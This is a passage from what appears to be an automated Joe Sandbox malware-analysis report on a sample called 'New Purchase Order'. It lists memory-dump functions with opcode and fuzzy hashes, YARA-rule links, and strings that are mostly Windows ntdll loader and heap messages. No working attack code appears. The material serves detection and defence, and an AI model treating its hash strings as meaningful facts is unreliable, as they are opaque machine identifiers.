                • API String ID: 0-1373925480
                • Opcode ID: 794ac189471dd637eff2fd39360cc1bf586577416dcf7adefe6f7ebc4b878668
                • Instruction ID: 3035b421d691819514b56174e22b18e32c7a22730be6b3c6b73b116ab1f0d93c
                • Opcode Fuzzy Hash: 794ac189471dd637eff2fd39360cc1bf586577416dcf7adefe6f7ebc4b878668
                • Instruction Fuzzy Hash: FF413432A00648CBEB26DBE9C844BADBBFDFF55344F24045ADA01EB781DB358A41CB11
                Function 01854755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                Strings
                • minkernel\ntdll\ldrredirect.c, xrefs: 01854899
                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01854888
                • LdrpCheckRedirection, xrefs: 0185488F
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-3154609507
                • Opcode ID: 88f8b80bb76349c9d81a18ad7c88bb0731fa37053f393b7fa3f47d8b4ee5e04f
                • Instruction ID: 1dfadcafc4037cd1500415f6c4a346eb2e904fcb6413b527b9b5ea03dc6d6117
                • Opcode Fuzzy Hash: 88f8b80bb76349c9d81a18ad7c88bb0731fa37053f393b7fa3f47d8b4ee5e04f
                • Instruction Fuzzy Hash: E941F236A042559FCBA1CE2DD840A26BBE4FF89B54F06066DED48D7311F731EA80CB81
                Function 017E0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-2558761708
                • Opcode ID: 28d47169e6aa3ca9ea555ba45ffb736b1ef4f5c4bfbed832aaff8ceef635104f
                • Instruction ID: 1dc05f5333da453d04da1150f1fb4934229cbbd1952d3da6af9b03b986c8b8d9
                • Opcode Fuzzy Hash: 28d47169e6aa3ca9ea555ba45ffb736b1ef4f5c4bfbed832aaff8ceef635104f
                • Instruction Fuzzy Hash: 0D11DCB1314102DFDB2DDA18C899B6AF3E4EF84B1AF18816DF406CB255DB70E941C791
                Function 018520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                Download Yara Rule
                Strings
                • minkernel\ntdll\ldrinit.c, xrefs: 01852104
                • Process initialization failed with status 0x%08lx, xrefs: 018520F3
                • LdrpInitializationFailure, xrefs: 018520FA
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2986994758
                • Opcode ID: 479575a4543021ce836316820146b9057b22d4e9d8a192b17b155e88de66f722
                • Instruction ID: 89e892586f8d799259fcb9d75b1343f0949d1764a73b5c3460c66690e0350e06
                • Opcode Fuzzy Hash: 479575a4543021ce836316820146b9057b22d4e9d8a192b17b155e88de66f722
                • Instruction Fuzzy Hash: 24F0C275680748BFE724E64DDC56FDA7769FB40B54F540069FA00AB286DAB0BB00CA91
                Function 017E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: #%u
                • API String ID: 48624451-232158463
                • Opcode ID: a333961571e2970837bc67cecef485f85cf9b4d56d84d915988e7c165ba540d4
                • Instruction ID: 289d1c503e140239780ede4333fd7dcc6c981cb03f27f573601f179426c48eee
                • Opcode Fuzzy Hash: a333961571e2970837bc67cecef485f85cf9b4d56d84d915988e7c165ba540d4
                • Instruction Fuzzy Hash: 68714971A0014A9FDB01DFA8C994FAEB7F8FF48704F144065E905E7251EA34EE41CBA1
                Function 017DA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                Download Yara Rule
                Strings
                • LdrResSearchResource Exit, xrefs: 017DAA25
                • LdrResSearchResource Enter, xrefs: 017DAA13
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                • API String ID: 0-4066393604
                • Opcode ID: 2c101bcd62d75fefb845f7fecc420954d2d350e7e1e5bdea2bcc1352a78533a0
                • Instruction ID: c03aca5edd1b2391bed0d8644ab5133e648256a0f7a6b6e772ef18c847919d3c
                • Opcode Fuzzy Hash: 2c101bcd62d75fefb845f7fecc420954d2d350e7e1e5bdea2bcc1352a78533a0
                • Instruction Fuzzy Hash: 57E18F71A0021DAFEB22CF98C980BAEFBBABF94310F144566ED01E7251D7749A41CB51
                Function 0189A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction ID: 4f0af97c8f1dd4bdc7df49a205b66cc396c1733a28986a73a6db4298164343f0
                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction Fuzzy Hash: 83C1C3312043469BEB29CF28C845B6BBBE5BFC4318F184A2DF696C7291D775D605CB82
                Function 0184E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Legacy$UEFI
                • API String ID: 2994545307-634100481
                • Opcode ID: c6829bb13e9e6d7659df5aad1882cbc8221c496676b2de4a30da872eb0793f56
                • Instruction ID: 31ade37f74386be67be2dafbb75c86b2957df036f3796f39ce61960eb1fb6503
                • Opcode Fuzzy Hash: c6829bb13e9e6d7659df5aad1882cbc8221c496676b2de4a30da872eb0793f56
                • Instruction Fuzzy Hash: 5A615E71E0031D9FEB15DFA8C840BADBBB9FB48704F54406DE649EB251DB35AA00CB50
                Function 018743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$MUI
                • API String ID: 0-17815947
                • Opcode ID: 557f6fdedddb8872cfddc146d58cc8dfe012390d675534bc09cf3255c47b8b2b
                • Instruction ID: 6f81f6072f5dc845dd0d013ce70ba92182b9a60a047cff6a7fc34c3b1fb5fec5
                • Opcode Fuzzy Hash: 557f6fdedddb8872cfddc146d58cc8dfe012390d675534bc09cf3255c47b8b2b
                • Instruction Fuzzy Hash: FA5107B1E0021DAEDB11DFA9CC84AEEBBBDEB48754F100529E611F7294D7309A45CB60
                Function 017D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                Download Yara Rule
                Strings
                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017D063D
                • kLsE, xrefs: 017D0540
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                • API String ID: 0-2547482624
                • Opcode ID: 8594278cd48478c818caf22f08dd89e1702b1379e8e4e46e40249bd8cb58d226
                • Instruction ID: 1192086a0967aafd97b65daa31b6e92244d5f85baa1f73309cf16d95dd6291ea
                • Opcode Fuzzy Hash: 8594278cd48478c818caf22f08dd89e1702b1379e8e4e46e40249bd8cb58d226
                • Instruction Fuzzy Hash: C051AC7150474A8FD724EF28C444AA7FBF4AF84314F24583EFAAA87241E770D545CBA2
                Function 017DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                Download Yara Rule
                Strings
                • RtlpResUltimateFallbackInfo Enter, xrefs: 017DA2FB
                • RtlpResUltimateFallbackInfo Exit, xrefs: 017DA309
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: b99216c2e03c85c7475293dfaa2b15e1b566e9b5e9371f89e3b72534cd06199b
                • Instruction ID: 81719a24dceb63af4a48224a341ba2028937857010a61b463511dda1231519ad
                • Opcode Fuzzy Hash: b99216c2e03c85c7475293dfaa2b15e1b566e9b5e9371f89e3b72534cd06199b
                • Instruction Fuzzy Hash: B941B131A04649DBDB15CF5DC844B6EBBF6FF85704F2840A9E900DB291EBB5DA40CB90
                Function 0180A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Cleanup Group$Threadpool!
                • API String ID: 2994545307-4008356553
                • Opcode ID: e556f63ea5bfb5d4c4101e9b98508dd8e9cb047d5689ad205ec2c9a02cfa6358
                • Instruction ID: 44463e895dd5beb86a76dd7c0d67d143f0ba8ef85861b9b52d07e8aa9b6af25c
                • Opcode Fuzzy Hash: e556f63ea5bfb5d4c4101e9b98508dd8e9cb047d5689ad205ec2c9a02cfa6358
                • Instruction Fuzzy Hash: 7001D1B2240708AFD352DF14CD45F2677F8EB85B15F018939A658CB190E334DA04CB46
                Function 017DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: MUI
                • API String ID: 0-1339004836
                • Opcode ID: fe69640791552b9979754f966a0b27ab339f7b09b9558d2037f88c5101776590
                • Instruction ID: a3d2947250474db326745020d7b17bebba0e03b3c7aea5c56d933742cc2dd280
                • Opcode Fuzzy Hash: fe69640791552b9979754f966a0b27ab339f7b09b9558d2037f88c5101776590
                • Instruction Fuzzy Hash: C2825B75E0021D8FEB25CFA9C980BEDFBB5BF48310F1481A9E959AB395D7309981CB50
                Function 01856420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 46b36055f677547c1a898fe9f45cb42c0d81f0766164552a5b1ae7db66e6500c
                • Instruction ID: fe1976b26e595833fbe772eafa619b60f13a76e6f1edf79a270ddc9500c951a8
                • Opcode Fuzzy Hash: 46b36055f677547c1a898fe9f45cb42c0d81f0766164552a5b1ae7db66e6500c
                • Instruction Fuzzy Hash: 8A917372940219AFEB21DB95CC85FAEBBB8EF18754F600055F700EB295E674AE00CB60
                Function 0187E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 957986af8a9bcdf78a2f35536372b33a5474b2b185f23f1b095b1a83ec262189
                • Instruction ID: 4b912e8661e60db5fce23328fc8ef52db0b81cb73bc5b4d97c6e20535ae1e597
                • Opcode Fuzzy Hash: 957986af8a9bcdf78a2f35536372b33a5474b2b185f23f1b095b1a83ec262189
                • Instruction Fuzzy Hash: 7891A072900609BEDB22AFA9DC84FAFBBB9EF45744F100069F505E7251EB34DA01CB91
                Function 0180A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: GlobalTags
                • API String ID: 0-1106856819
                • Opcode ID: 302543a3e277a53e6a5f9eb18125658180fb6f2035a053ed0eabaaff085bafff
                • Instruction ID: a5a5f1e1fb7319ddef91e9a80966de523ec1a396ed1724b22910c12a9b717455
                • Opcode Fuzzy Hash: 302543a3e277a53e6a5f9eb18125658180fb6f2035a053ed0eabaaff085bafff
                • Instruction Fuzzy Hash: 71716BB5E0020E8FEF28CF9CC9906ADBBB1BF59714F24812AE505E7241EB318A41CB50
                Function 01874978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: .mui
                • API String ID: 0-1199573805
                • Opcode ID: 174a770b20aa18d7260c6b950528379c41360755463430703efbb9045f851528
                • Instruction ID: acf943690a9f1b33d3e680a35fc07ad377f3dce6abbb1f4c96979ff44a835ddc
                • Opcode Fuzzy Hash: 174a770b20aa18d7260c6b950528379c41360755463430703efbb9045f851528
                • Instruction Fuzzy Hash: D8518472D0022A9BDB11EF99D844AAEFBB4AF18B14F054169E912FB250D774DE01CBE4
                Function 017EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: EXT-
                • API String ID: 0-1948896318
                • Opcode ID: 86636defff9c950b515a103a208858f8c06973d26d73be753dbd382925247328
                • Instruction ID: 2789e94426bc37d7fc437fe6d1cac619bb15acb33d4b51bc4e8b7a554bad17a0
                • Opcode Fuzzy Hash: 86636defff9c950b515a103a208858f8c06973d26d73be753dbd382925247328
                • Instruction Fuzzy Hash: 364191725483129BD710DA79D848B6BFBE8AF8C714F440E6DF684D7280EA74DA04C797
                Function 0184C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: BinaryHash
                • API String ID: 0-2202222882
                • Opcode ID: 8e587b65f5ca8b81161858b00a6480e1b63ca7b63f9247bc04c2b59cbb114e4a
                • Instruction ID: ad30b7e1fa78be232b1e453a0b923eed95a94964ebcb10710e6761f7f81ef199
                • Opcode Fuzzy Hash: 8e587b65f5ca8b81161858b00a6480e1b63ca7b63f9247bc04c2b59cbb114e4a
                • Instruction Fuzzy Hash: 534154B2D0112DABDB21DA54CC84FDEB77DAB44714F0045A5EB08EB141DB709F898FA5
                Function 01866B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: #
                • API String ID: 0-1885708031
                • Opcode ID: b752d7cda5f6ef76f848401d3b50d72da29a19f3b588beabf9cc223914c8c687
                • Instruction ID: 99aba85182f37b05e8dfad162e6f179fb25be84674f095ee1cda8e3cee7d0be0
                • Opcode Fuzzy Hash: b752d7cda5f6ef76f848401d3b50d72da29a19f3b588beabf9cc223914c8c687
                • Instruction Fuzzy Hash: 91312C31A00B899BDB22CB6DC854BAE7BACDF54704F244028E941EB286E775DA05CB50
                Function 0184CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: BinaryName
                • API String ID: 0-215506332
                • Opcode ID: e72b8000ef5afb7ba4d657c8ddf589937d3560104ac48964c26ec7faf2b7538a
                • Instruction ID: a05ea6882ab8e29fc7421ab5a8b49ea663d5d19625525d3c531f36ecf1d45869
                • Opcode Fuzzy Hash: e72b8000ef5afb7ba4d657c8ddf589937d3560104ac48964c26ec7faf2b7538a
                • Instruction Fuzzy Hash: 7531313690251EAFEB16CA48C844E6FFBB8EB80724F014029E901E7291DB309F00DBE0
                Function 0185892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                Download Yara Rule
                Strings
                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0185895E
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                • API String ID: 0-702105204
                • Opcode ID: 0946887d35e2285565052d689c1ce29725843981864aeeca01b404783d89c6af
                • Instruction ID: a9e2d4175cff0da6f66ba1ba5838d05fa8c27a13f4d37a8ba2911457251098af
                • Opcode Fuzzy Hash: 0946887d35e2285565052d689c1ce29725843981864aeeca01b404783d89c6af
                • Instruction Fuzzy Hash: 6401F7313002159FEB615A5BCCC8A66BFB6EFC6754B04001EFA4296151CB30AA41CB92
                Function 01872000 Relevance: .8, Instructions: 757COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cbe3cba486dbb3a58240f7149d8e837a97bd697076a9a0c93b880938eef4e978
                • Instruction ID: 44838b425544c497f099bd9a67c94f28a73bbdfcd5ebf9d38e25e87cc6e782ca
                • Opcode Fuzzy Hash: cbe3cba486dbb3a58240f7149d8e837a97bd697076a9a0c93b880938eef4e978
                • Instruction Fuzzy Hash: 1F42D1326083419BE725CF68C890A6BFBE6FF88344F08092DFA96D7250D771DA45CB52
                Function 01868158 Relevance: .6, Instructions: 617COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d5a4fe1101f77c72211bf34ea0100645723c3d95091aceae63387458a9aaf94
                • Instruction ID: a22478e1edda26c3f3bcf9a641b5309ad4b88e1f7e9c0314b223be18aa35cc4d
                • Opcode Fuzzy Hash: 7d5a4fe1101f77c72211bf34ea0100645723c3d95091aceae63387458a9aaf94
                • Instruction Fuzzy Hash: 94423B75A003198FEB25CF69C881BADBBF9BF49304F148199E94DEB242D7349A85CF50
                Function 017E2840 Relevance: .6, Instructions: 605COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1babdcd1e72be32297e569930488ffea665999489f4d77429c770aee4975a4b6
                • Instruction ID: 18c426a66275e213be5d2db32d8bf7d3dc5e89f1a12c18d7df3083c68f190725
                • Opcode Fuzzy Hash: 1babdcd1e72be32297e569930488ffea665999489f4d77429c770aee4975a4b6
                • Instruction Fuzzy Hash: AF32AE70A00759ABDB25CF6DC8547BABBF2BF88304F28411DD586DB285E735AB41CB90
                Function 0187A118 Relevance: .6, Instructions: 591COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 86b6bd37c2718a901fdb4d67d2e85859e9a8434d5eb19af50edf3ae1b4f0f716
                • Instruction ID: 788ef849efa1dc6a4509162cb7c11612ba55e2c53580c1b2debe44df2a1a0650
                • Opcode Fuzzy Hash: 86b6bd37c2718a901fdb4d67d2e85859e9a8434d5eb19af50edf3ae1b4f0f716
                • Instruction Fuzzy Hash: FD22D1742046658BEB2DCF2DC09437ABBF1AF44344F0C8499E996CF286E335D692DB61
                Function 017D6A50 Relevance: .5, Instructions: 548COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 66652aca6e9bb018d99372a1a7505eee91bec1e6d0095299a0072cea8e697e68
                • Instruction ID: e6729b6dff4ee0e91c3797236e0237a8929d18e97cb142ef03daab9ca2bb63e8
                • Opcode Fuzzy Hash: 66652aca6e9bb018d99372a1a7505eee91bec1e6d0095299a0072cea8e697e68
                • Instruction Fuzzy Hash: 87327C71A04209CFDB25CF68C484AAAFBF2FF88310F2445A9E956EB351D774E941CB91
                Function 017F4A35 Relevance: .4, Instructions: 423COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                • Instruction ID: 1b6c63ce8975351423e54f0968f8452a1d27abcb1bb7d6c38435fd159db905be
                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                • Instruction Fuzzy Hash: 59F14B71E0021A9BDB15CFA9C584BAFFBB5AF48710F08816DEA06EB345E734D941CB90
                Function 0186892B Relevance: .4, Instructions: 386COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e6fab0867f2881f27b979e36ee0f55a8b235aa4b4f7faeb61eb2038d8de5e147
                • Instruction ID: fc4f33bcf9c6e68d282df1f6170dcd0773480753a8866096790eaf8f60472328
                • Opcode Fuzzy Hash: e6fab0867f2881f27b979e36ee0f55a8b235aa4b4f7faeb61eb2038d8de5e147
                • Instruction Fuzzy Hash: 2AD1E171A0070A8FDF15CF69C841AFEB7FAAF89304F188169D959E7241E735EA05CB60
                Function 017D65D0 Relevance: .4, Instructions: 383COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e78b4f50c89325a6141449f36c18ef21d3665fa43d05bda927c8e5f3bdcf11de
                • Instruction ID: 3e8a48bf1b088b02c3551d390db5ba8993d075bc8c19f56a2cff65ae5b38d777
                • Opcode Fuzzy Hash: e78b4f50c89325a6141449f36c18ef21d3665fa43d05bda927c8e5f3bdcf11de
                • Instruction Fuzzy Hash: 92E17A716083468FC715CF28C494A6AFBF0BF89314F15896DF99987351EB31E905CB92
                Function 017C8397 Relevance: .4, Instructions: 380COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6edcca7d3bd33a3011686512c3b89bee270e7541db3ff95aed68c546431b5700
                • Instruction ID: 64401e788b030b9da4a3f2a760aa8fc9256785dcb312b704a0ae0e523d7b738c
                • Opcode Fuzzy Hash: 6edcca7d3bd33a3011686512c3b89bee270e7541db3ff95aed68c546431b5700
                • Instruction Fuzzy Hash: 64D1F271A0021A9BDB25CF68C880ABBF7F5FF54B04F04466DE916DB285EB34EA50CB51
                Function 01858243 Relevance: .3, Instructions: 322COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction ID: de6052908631eea0141d246928ef0687fd0fb4cf2de8feae7396142fbb2a9a61
                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction Fuzzy Hash: ECB1A374A006099FDB64DF9AC940EABBFB9FF85344F10445EAE42D7791DA70EA06CB10
                Function 017E0535 Relevance: .3, Instructions: 300COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                • Instruction ID: 09f57b9a789d2587b36d9fb9471f040cd227f085f64cbf4be7f7cf2de1f120c9
                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
